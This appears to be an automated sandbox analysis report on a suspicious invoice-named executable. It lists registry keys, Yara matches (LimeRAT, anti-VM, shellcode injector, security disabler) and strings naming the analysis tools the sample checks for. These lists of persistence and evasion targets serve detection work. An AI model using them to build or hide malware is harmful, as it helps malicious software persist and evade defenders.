Source: MpSigStub.exe, 00000024.00000003.6312336240.00000197A3E16000.00000004.00000001.sdmp	String found in binary or memory: DOWS\CURRENTVERSION\INTERNET SETTINGS\\CertificateRevocationXHKLM\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\INTERNET SETTINGS\\CertificateRevocationSHKCU\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\INTERNET SETTINGS\5.0\USER AGENT\\SHKLM\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\INTERNET SETTINGS\5.0\USER AGENT\\DHKCU\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\EXT\PREAPPROVED\\\DHKLM\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\EXT\PREAPPROVED\\\LHKLM\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\WindowsUpdate\Auto Update\\>HKLM\SOFTWARE\MICROSOFT\WINDOWS NT\CURRENTVERSION\WINLOGON\\WHKLM\SOFTWARE\MICROSOFT\WINDOWS NT\CURRENTVERSION\WINLOGON\SpecialAccounts\UserList\\>HKCU\SOFTWARE\MICROSOFT\WINDOWS NT\CURRENTVERSION\WINLOGON\\JHKLM\SOFTWARE\Wow6432Node\MICROSOFT\WINDOWS NT\CURRENTVERSION\WINLOGON\\JHKCU\SOFTWARE\Wow6432Node\MICROSOFT\WINDOWS NT\CURRENTVERSION\WINLOGON\\@HKCU\SOFTWARE\MICROSOFT\WINDOWS NT\CURRENTVERSION\WINDOWS\\LOADLHKCU\SOFTWARE\Wow6432Node\MICROSOFT\WINDOWS NT\CURRENTVERSION\WINDOWS\\LOAD?HKCU\SOFTWARE\MICROSOFT\WINDOWS NT\CURRENTVERSION\WINDOWS\\RUNKHKCU\SOFTWARE\Wow6432Node\MICROSOFT\WINDOWS NT\CURRENTVERSION\WINDOWS\\RUN^HKLM\SOFTWARE\MICROSOFT\WINDOWS NT\CURRENTVERSION\IMAGE FILE EXECUTION OPTIONS\(1)\\DEBUGGERIHKCU\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\PACKAGEDAPPXDEBUG\(1)\\IHKLM\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\PACKAGEDAPPXDEBUG\(1)\\WHKCU\SOFTWARE\CLASSES\ACTIVATABLECLASSES\PACKAGE\(1)\DEBUGINFORMATION\(1)\\DEBUGPATHWHKLM\SOFTWARE\CLASSES\ACTIVATABLECLASSES\PACKAGE\(1)\DEBUGINFORMATION\(1)\\DEBUGPATHKHKLM\SOFTWARE\MICROSOFT\WINDOWS NT\CURRENTVERSION\SYSTEMRESTORE\\DISABLESR+HKLM\SOFTWARE\MICROSOFT\SECURITY CENTER\\/HKLM\SOFTWARE\MICROSOFT\SECURITY CENTER\SVC\\>HKLM\Software\Microsoft\Windows Defender Security Center\\\-HKCU\SOFTWARE\MICROSOFT\INTERNET EXPLORER\\-HKLM\SOFTWARE\MICROSOFT\INTERNET EXPLORER\\2HKCU\SOFTWARE\MICROSOFT\INTERNET EXPLORER\EUPP\\2HKLM\SOFTWARE\MICROSOFT\INTERNET EXPLORER\EUPP\\6HKCU\SOFTWARE\MICROSOFT\INTERNET EXPLORER\EUPP\DSP\\6HKLM\SOFTWARE\MICROSOFT\INTERNET EXPLORER\EUPP\DSP\\GHKCU\SOFTWARE\MICROSOFT\INTERNET EXPLORER\DOWNLOAD\\CHECKEXESIGNATURESEHKCU\SOFTWARE\MICROSOFT\INTERNET EXPLORER\DESKTOP\GENERAL\\WALLPAPERDHKCU\SOFTWARE\MICROSOFT\INTERNET EXPLORER\PHISHINGFILTER\\ENABLEDV8AHKCU\SOFTWARE\MICROSOFT\INTERNET EXPLORER\APPROVED EXTENSIONS\\AHKLM\SOFTWARE\MICROSOFT\INTERNET EXPLORER\APPROVED EXTENSIONS\\HHKCU\SOFTWARE\MICROSOFT\INTERNET EXPLORER\LOW RIGHTS\ELEVATIONPOLICY\\HHKLM\SOFTWARE\MICROSOFT\INTERNET EXPLORER\LOW RIGHTS\ELEVATIONPOLICY\\*
Source: MpSigStub.exe, 00000024.00000003.6431842764.00000197A4D63000.00000004.00000001.sdmp	String found in binary or memory: SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts\UserList
Source: MpSigStub.exe, 00000024.00000003.6431842764.00000197A4D63000.00000004.00000001.sdmp	String found in binary or memory: SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts\UserList]

Source: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\9B256797-6DAD-4B73-B8E9-EA48023428D4\MpSigStub.exe

Registry key monitored for changes: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows Defender

Source: C:\Users\user\Desktop\FACTURA.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\Desktop\FACTURA.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\Desktop\FACTURA.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\Desktop\FACTURA.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\Desktop\FACTURA.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\Desktop\FACTURA.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\Desktop\FACTURA.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\Desktop\FACTURA.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: FAILCRITICALERRORS \| NOGPFAULTERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: FAILCRITICALERRORS \| NOGPFAULTERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\mpam-5e107659.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\mpam-5e107659.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\mpam-5e107659.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\mpam-5e107659.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\mpam-5e107659.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\mpam-5e107659.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\mpam-5e107659.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\mpam-5e107659.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\mpam-5e107659.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\mpam-5e107659.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\mpam-5e107659.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\9B256797-6DAD-4B73-B8E9-EA48023428D4\MpSigStub.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\9B256797-6DAD-4B73-B8E9-EA48023428D4\MpSigStub.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\9B256797-6DAD-4B73-B8E9-EA48023428D4\MpSigStub.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\9B256797-6DAD-4B73-B8E9-EA48023428D4\MpSigStub.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\9B256797-6DAD-4B73-B8E9-EA48023428D4\MpSigStub.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\9B256797-6DAD-4B73-B8E9-EA48023428D4\MpSigStub.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\9B256797-6DAD-4B73-B8E9-EA48023428D4\MpSigStub.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\9B256797-6DAD-4B73-B8E9-EA48023428D4\MpSigStub.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\9B256797-6DAD-4B73-B8E9-EA48023428D4\MpSigStub.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\9B256797-6DAD-4B73-B8E9-EA48023428D4\MpSigStub.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\9B256797-6DAD-4B73-B8E9-EA48023428D4\MpSigStub.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\9B256797-6DAD-4B73-B8E9-EA48023428D4\MpSigStub.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\9B256797-6DAD-4B73-B8E9-EA48023428D4\MpSigStub.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\9B256797-6DAD-4B73-B8E9-EA48023428D4\MpSigStub.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\9B256797-6DAD-4B73-B8E9-EA48023428D4\MpSigStub.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\9B256797-6DAD-4B73-B8E9-EA48023428D4\MpSigStub.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\9B256797-6DAD-4B73-B8E9-EA48023428D4\MpSigStub.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\9B256797-6DAD-4B73-B8E9-EA48023428D4\MpSigStub.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\9B256797-6DAD-4B73-B8E9-EA48023428D4\MpSigStub.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\9B256797-6DAD-4B73-B8E9-EA48023428D4\MpSigStub.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\9B256797-6DAD-4B73-B8E9-EA48023428D4\MpSigStub.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\9B256797-6DAD-4B73-B8E9-EA48023428D4\MpSigStub.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\9B256797-6DAD-4B73-B8E9-EA48023428D4\MpSigStub.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\9B256797-6DAD-4B73-B8E9-EA48023428D4\MpSigStub.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\9B256797-6DAD-4B73-B8E9-EA48023428D4\MpSigStub.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\9B256797-6DAD-4B73-B8E9-EA48023428D4\MpSigStub.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\9B256797-6DAD-4B73-B8E9-EA48023428D4\MpSigStub.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\9B256797-6DAD-4B73-B8E9-EA48023428D4\MpSigStub.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\mpam-fad3e9a8.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\mpam-fad3e9a8.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\mpam-fad3e9a8.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\mpam-fad3e9a8.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\mpam-fad3e9a8.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\mpam-fad3e9a8.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\mpam-fad3e9a8.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\mpam-fad3e9a8.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\mpam-fad3e9a8.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\mpam-fad3e9a8.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\mpam-fad3e9a8.exe	Process information set: NOOPENFILEERRORBOX

Malware Analysis System Evasion:

Yara detected AntiVM3

Show sources

Source: Yara match	File source: 36.3.MpSigStub.exe.197a433f6c2.83.unpack, type: UNPACKEDPE
Source: Yara match	File source: 36.3.MpSigStub.exe.197a46aeebe.25.unpack, type: UNPACKEDPE
Source: Yara match	File source: 36.3.MpSigStub.exe.197a4673aed.13.unpack, type: UNPACKEDPE
Source: Yara match	File source: 36.3.MpSigStub.exe.197a36a8ae6.146.unpack, type: UNPACKEDPE
Source: Yara match	File source: 36.3.MpSigStub.exe.197a46aeebe.14.unpack, type: UNPACKEDPE
Source: Yara match	File source: 36.3.MpSigStub.exe.197a497a30f.132.unpack, type: UNPACKEDPE
Source: Yara match	File source: 36.3.MpSigStub.exe.197a46f017a.26.unpack, type: UNPACKEDPE
Source: Yara match	File source: 36.3.MpSigStub.exe.197a46f017a.58.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000024.00000003.6291090515.00000197A33E4000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000024.00000003.6333813745.00000197A33E4000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000024.00000003.6336709311.00000197A33E4000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000024.00000003.6306777580.00000197A39F4000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000024.00000003.6290353787.00000197A39F4000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000024.00000003.6271076584.00000197A3A37000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000024.00000003.6329279249.00000197A33E4000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000024.00000003.6294532862.00000197A39F4000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: MpSigStub.exe PID: 5556, type: MEMORYSTR

Yara detected LimeRAT

Show sources

Source: Yara match	File source: 00000024.00000003.6437415503.00000197A38EC000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000024.00000003.6438683964.00000197A371E000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: MpSigStub.exe PID: 5556, type: MEMORYSTR

Yara detected generic Shellcode Injector

Show sources

Source: Yara match	File source: 36.3.MpSigStub.exe.197a497a30f.132.unpack, type: UNPACKEDPE
Source: Yara match	File source: 36.3.MpSigStub.exe.197a46f017a.26.unpack, type: UNPACKEDPE
Source: Yara match	File source: 36.3.MpSigStub.exe.197a46f017a.58.unpack, type: UNPACKEDPE
Source: Yara match	File source: Process Memory Space: MpSigStub.exe PID: 5556, type: MEMORYSTR

Yara detected Windows Security Disabler

Show sources

Source: Yara match

File source: Process Memory Space: MpSigStub.exe PID: 5556, type: MEMORYSTR

Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)

Show sources

Source: MpSigStub.exe, 00000024.00000003.6280960340.00000197A4381000.00000004.00000001.sdmp	Binary or memory string: HOOKEXPLORER.EXE
Source: MpSigStub.exe, 00000024.00000003.6311649432.00000197A38AA000.00000004.00000001.sdmp	Binary or memory string: AUTORUNSC.EXE
Source: MpSigStub.exe, 00000024.00000003.6349678928.00000197A3C89000.00000004.00000001.sdmp	Binary or memory string: SUPERANTISPYWARE.EXE
Source: MpSigStub.exe, 00000024.00000003.6288538370.00000197A46DA000.00000004.00000001.sdmp	Binary or memory string: PEID.EXE
Source: MpSigStub.exe, 00000024.00000003.6290223213.00000197A39E2000.00000004.00000001.sdmp	Binary or memory string: APISPY.EXE
Source: MpSigStub.exe, 00000024.00000003.6349678928.00000197A3C89000.00000004.00000001.sdmp	Binary or memory string: !#BM_COPYRENAMEDINAME_AUTORUNS.EXE
Source: MpSigStub.exe, 00000024.00000003.6274632476.00000197A2E92000.00000004.00000001.sdmp	Binary or memory string: FRIDA-WINJECTOR-HELPER-64.EXE
Source: MpSigStub.exe, 00000024.00000003.6294257169.00000197A398C000.00000004.00000001.sdmp	Binary or memory string: API_LOG.DLL
Source: MpSigStub.exe, 00000024.00000003.6323089969.00000197A3C04000.00000004.00000001.sdmp	Binary or memory string: WINDBG.EXE
Source: MpSigStub.exe, 00000024.00000003.6338261504.00000197A4590000.00000004.00000001.sdmp	Binary or memory string: !E!#BM_COPYRENAMEDONAME_PROCMON.EXE
Source: MpSigStub.exe, 00000024.00000003.6330297949.00000197A369B000.00000004.00000001.sdmp	Binary or memory string: !#SLF:AGGR:COPYRENAMED!PROCMON.EXE
Source: MpSigStub.exe, 00000024.00000003.6330297949.00000197A369B000.00000004.00000001.sdmp	Binary or memory string: "G!#BM_COPYRENAMEDONAME_AUTORUNS.EXE
Source: MpSigStub.exe, 00000024.00000003.6330297949.00000197A369B000.00000004.00000001.sdmp	Binary or memory string: "H!#SLF:AGGR:COPYRENAMED!PROCMON.EXE
Source: MpSigStub.exe, 00000024.00000003.6440763384.00000197A4E29000.00000004.00000001.sdmp	Binary or memory string: DBGHELP.DLLSBIEDLL.DLL
Source: MpSigStub.exe, 00000024.00000003.6439501262.00000197A4A33000.00000004.00000001.sdmp	Binary or memory string: OLLYDBGOLLYICEPEDITORLORDPEC32ASMIMPORTREC.EXE
Source: MpSigStub.exe, 00000024.00000003.6326616398.00000197A3216000.00000004.00000001.sdmp	Binary or memory string: &[!#SLF:AGGR:MASQUERADE_AS!AUTORUNSC.EXE
Source: MpSigStub.exe, 00000024.00000003.6280199077.00000197A44B4000.00000004.00000001.sdmp	Binary or memory string: C:\PROGRAMDATA\SANDBOXIE\SBIEDLL.DLL
Source: MpSigStub.exe, 00000024.00000003.6280199077.00000197A44B4000.00000004.00000001.sdmp	Binary or memory string: $C:\PROGRAMDATA\SANDBOXIE\SBIEDLL.DLL
Source: MpSigStub.exe, 00000024.00000003.6326616398.00000197A3216000.00000004.00000001.sdmp	Binary or memory string: !#SLF:AGGR:MASQUERADE_AS!AUTORUNSC.EXE
Source: MpSigStub.exe, 00000024.00000003.6351148277.00000197A49F2000.00000004.00000001.sdmp	Binary or memory string: FILEMON.EXE
Source: MpSigStub.exe, 00000024.00000003.6320871262.00000197A4180000.00000004.00000001.sdmp	Binary or memory string: PROCMON.EXE
Source: MpSigStub.exe, 00000024.00000003.6323089969.00000197A3C04000.00000004.00000001.sdmp	Binary or memory string: !#SLF:AGGR:MASQUERADE_AS!PROCMON.EXE
Source: MpSigStub.exe, 00000024.00000003.6274632476.00000197A2E92000.00000004.00000001.sdmp	Binary or memory string: FRIDA-WINJECTOR-HELPER-32.EXE
Source: MpSigStub.exe, 00000024.00000003.6436704102.00000197A4AFA000.00000004.00000001.sdmp	Binary or memory string: PTABLE)(LAPTOP)(NOTEBOOK)(SUB NOTEBOOK)%S \%D.%D.%D.%D%04X%04XSBIEDLL.DLLDBGHELP.DLLAPI_LOG.
Source: MpSigStub.exe, 00000024.00000003.6351148277.00000197A49F2000.00000004.00000001.sdmp	Binary or memory string: REGMON.EXE
Source: MpSigStub.exe, 00000024.00000003.6323089969.00000197A3C04000.00000004.00000001.sdmp	Binary or memory string: !#SLF:AGGR:MASQUERADE_AS!AUTORUNS.EXE
Source: MpSigStub.exe, 00000024.00000003.6272683059.00000197A4405000.00000004.00000001.sdmp	Binary or memory string: SBIEDLL.DLLSBIEDLLX.DLLHTTP://
Source: MpSigStub.exe, 00000024.00000003.6323089969.00000197A3C04000.00000004.00000001.sdmp	Binary or memory string: SANDBOXIEDCOMLAUNCH.EXE
Source: MpSigStub.exe, 00000024.00000003.6350540468.00000197A32DC000.00000004.00000001.sdmp	Binary or memory string: !#BM_COPYRENAMEDINAME_AUTORUNSC.EXE
Source: MpSigStub.exe, 00000024.00000003.6338261504.00000197A4590000.00000004.00000001.sdmp	Binary or memory string: !#BM_COPYRENAMEDINAME_PROCMON.EXE
Source: MpSigStub.exe, 00000024.00000003.6321843775.00000197A2FD4000.00000004.00000001.sdmp	Binary or memory string: \MSNSNIFFER\MSNSNIFFER.EXE]
Source: MpSigStub.exe, 00000024.00000003.6271796009.00000197A32DD000.00000004.00000001.sdmp	Binary or memory string: !#BM_COPYRENAMEDONAME_AUTORUNSC.EXE
Source: MpSigStub.exe, 00000024.00000003.6323089969.00000197A3C04000.00000004.00000001.sdmp, MpSigStub.exe, 00000024.00000003.6348335236.00000197A3259000.00000004.00000001.sdmp	Binary or memory string: REGSHOT.EXE
Source: MpSigStub.exe, 00000024.00000003.6323089969.00000197A3C04000.00000004.00000001.sdmp	Binary or memory string: %Z!#SLF:AGGR:MASQUERADE_AS!AUTORUNS.EXE
Source: MpSigStub.exe, 00000024.00000003.6301822800.00000197A4E6B000.00000004.00000001.sdmp, MpSigStub.exe, 00000024.00000003.6351148277.00000197A49F2000.00000004.00000001.sdmp	Binary or memory string: WIRESHARK.EXE
Source: MpSigStub.exe, 00000024.00000003.6288538370.00000197A46DA000.00000004.00000001.sdmp	Binary or memory string: IDAG.EXE
Source: MpSigStub.exe, 00000024.00000003.6321843775.00000197A2FD4000.00000004.00000001.sdmp	Binary or memory string: &\MSNSNIFFER\MSNSNIFFER.EXE]
Source: MpSigStub.exe, 00000024.00000003.6438683964.00000197A371E000.00000004.00000001.sdmp	Binary or memory string: QEMU-GA.EXE
Source: MpSigStub.exe, 00000024.00000003.6338261504.00000197A4590000.00000004.00000001.sdmp	Binary or memory string: !#BM_COPYRENAMEDONAME_PROCMON.EXE
Source: MpSigStub.exe, 00000024.00000003.6348335236.00000197A3259000.00000004.00000001.sdmp	Binary or memory string: SBIESVC.EXE
Source: MpSigStub.exe, 00000024.00000003.6289251468.00000197A3F1F000.00000004.00000001.sdmp	Binary or memory string: !#SLF:AGGR:COPYRENAMED!AUTORUNS.EXE
Source: MpSigStub.exe, 00000024.00000003.6311649432.00000197A38AA000.00000004.00000001.sdmp	Binary or memory string: IMPORTREC.EXE
Source: MpSigStub.exe, 00000024.00000003.6296880704.00000197A4AB8000.00000004.00000001.sdmp	Binary or memory string: \|ACCESSCHK.EXE\|ACCESSCHK64.EXE\|ACCESSENUM.EXE\|ACRORD32.EXE\|ADEXPLORER.EXE\|ADINSIGHT.EXE\|ADRESTORE.EXE\|APPLICATIONFRAMEHOST.EXE\|APPVCLIENT.EXE\|APPVLP.EXE\|ATBROKER.EXE\|AUDIODG.EXE\|AUTORUNS.EXE\|AUTORUNS64.EXE\|AUTORUNSC.EXE\|AUTORUNSC64.EXE\|BASH.EXE\|BGINFO.EXE\|BGINFO64.EXE\|BITSADMIN.EXE\|BROWSER_BROKER.EXE\|CALC.EXE\|CDB.EXE\|CERTUTIL.EXE\|CLOCKRES.EXE\|CLOCKRES64.EXE\|CMD.EXE\|CMDKEY.EXE\|CMSTP.EXE\|CONHOST.EXE\|CONSENT.EXE\|CONTIG.EXE\|CONTIG64.EXE\|CONTROL.EXE\|COREINFO.EXE\|CSC.EXE\|CSCRIPT.EXE\|CSI.EXE\|CSRSS.EXE\|CTFMON.EXE\|CTRL2CAP.EXE\|DASHOST.EXE\|DATAEXCHANGEHOST.EXE\|DBGVIEW.EXE\|DFSVC.EXE\|DISK2VHD.EXE\|DISKEXT.EXE\|DISKEXT64.EXE\|DISKSHADOW.EXE\|DLLHOST.EXE\|DNSCMD.EXE\|DNX.EXE\|DXCAP.EXE\|ESENTUTL.EXE\|EXPAND.EXE\|EXPLORER.EXE\|EXTEXPORT.EXE\|EXTRAC32.EXE\|FINDLINKS.EXE\|FINDLINKS64.EXE\|FINDSTR.EXE\|FONTDRVHOST.EXE\|FORFILES.EXE\|FXSSVC.EXE\|GPSCRIPT.EXE\|GPUP.EXE\|HANDLE.EXE\|HANDLE64.EXE\|HEX2DEC.EXE\|HEX2DEC64.EXE\|HH.EXE\|IE4UINIT.EXE\|IEEXEC.EXE\|INFDEFAULTINSTALL.EXE\|INSTALLUTIL.EXE\|JUNCTION.EXE\|JUNCTION64.EXE\|LDMDUMP.EXE\|LIVEKD.EXE\|LIVEKD64.EXE\|LOADORD.EXE\|LOADORD64.EXE\|LOADORDC.EXE\|LOADORDC64.EXE\|LOCKAPP.EXE\|LOGONSESSIONS.EXE\|LOGONSESSIONS64.EXE\|LSAISO.EXE\|LSASS.EXE\|MAKECAB.EXE\|MAVINJECT.EXE\|MFTRACE.EXE\|MICROSOFTEDGE.EXE\|MICROSOFTEDGECP.EXE\|MICROSOFTEDGESH.EXE\|MSBUILD.EXE\|MSCONFIG.EXE\|MSDEPLOY.EXE\|MSDT.EXE\|MSDTC.EXE\|MSHTA.EXE\|MSIEXEC.EXE\|MSXSL.EXE\|NETSH.EXE\|NLNOTES.EXE\|NLTEST.EXE\|NOTES.EXE\|NOTMYFAULT.EXE\|NOTMYFAULT64.EXE\|NOTMYFAULTC.EXE\|NOTMYFAULTC64.EXE\|NTFSINFO.EXE\|NTFSINFO64.EXE\|NTOSKRNL.EXE\|NVUDISP.EXE\|NVUHDA6.EXE\|ODBCCONF.EXE\|OPENWITH.EXE\|PAGEDFRG.EXE\|PCALUA.EXE\|PCWRUN.EXE\|PENDMOVES.EXE\|PENDMOVES64.EXE\|PIPELIST.EXE\|PIPELIST64.EXE\|POWERSHELL.EXE\|PRESENTATIONHOST.EXE\|PRINT.EXE\|PROCDUMP.EXE\|PROCDUMP64.EXE\|PROCEX